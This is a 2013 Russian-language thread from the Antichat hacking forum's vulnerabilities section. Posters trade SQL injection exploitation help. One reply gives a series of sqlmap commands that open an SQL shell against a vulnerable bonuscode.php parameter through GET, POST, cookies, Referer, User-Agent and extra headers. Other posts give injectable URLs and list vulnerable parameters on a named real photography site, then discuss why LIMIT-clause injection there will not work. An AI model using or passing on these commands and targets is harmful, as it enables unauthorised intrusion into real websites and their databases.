HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.03.2013, 16:03
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.
 
Ответить с цитированием

  #2  
Старый 05.03.2013, 16:51
\/IRUS
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами: 7250006

Репутация: 37
По умолчанию

Цитата:
Сообщение от zloy_fantom  
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");
в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell

в POST параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell

в Cookie параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell

в Referer:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell

в User-Agent:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell

в любом добавочном хидере:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell

и т.д.
 
Ответить с цитированием

  #3  
Старый 05.03.2013, 18:00
zloy_fantom
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами: 7074326

Репутация: 0
По умолчанию

\/IRUS

Большое спасибо, буду пробовать
 
Ответить с цитированием

  #4  
Старый 05.03.2013, 19:10
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами: 9018815

Репутация: 0
По умолчанию

ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut

http://www.pixheaven.net/bestof.php?begin=276&entout=12'

ili

http://www.pixheaven.net/photo.php?nom=120906_9930-46'
 
Ответить с цитированием

  #5  
Старый 05.03.2013, 21:16
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от borntobebad  
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
что-то я тоже не могу вдуплить

просмотрел сайт, вот эти уязвимые к sql-inj параметры:

Код:
/bestof.php
begin 
entout 

/bestof_us.php
begin 
entout 

/blog.php
begin 

/blog_us.php
begin 

/livredor_lire.php
begin 

/livredor_lire_us.php
begin 

/maj.php
begin 

/maj_us.php
begin 

/photo
nom 

/photo.php
nom 

/photo_us
nom 

/publications_site.php
begin 

/publications_site_us.php
begin 

/recherche_quoi.php
Afficher 
begin 
entout 

/recherche_quoi_us.php
Afficher 
begin 
entout 

/wallpapers.php
begin 
entout 

/wallpapers_us.php
begin 
entout
но ни один не смог раскрутить...
 
Ответить с цитированием

  #6  
Старый 05.03.2013, 22:13
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от borntobebad  
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'
иньекция в лимите, поэтому ничего и не выходит
 
Ответить с цитированием

  #7  
Старый 05.03.2013, 22:17
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами: 9018815

Репутация: 0
По умолчанию

kokoy progoy ti naskanil eti dannie ? GhostW
 
Ответить с цитированием

  #8  
Старый 05.03.2013, 22:19
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами: 9018815

Репутация: 0
По умолчанию

qaz , tak tipo ne-kak ne razkrutit ?
 
Ответить с цитированием

  #9  
Старый 05.03.2013, 23:28
\/IRUS
Постоянный
Регистрация: 03.08.2012
Сообщений: 371
С нами: 7250006

Репутация: 37
По умолчанию

Цитата:
Сообщение от borntobebad  
qaz , tak tipo ne-kak ne razkrutit ?
нетс
 
Ответить с цитированием

  #10  
Старый 05.03.2013, 23:31
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
иньекция в лимите, поэтому ничего и не выходит
Инъекция в Лимите прекрасно крутится.

Тут правильнее сказать "инъекция в лимите с использованием в запросе order by".
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...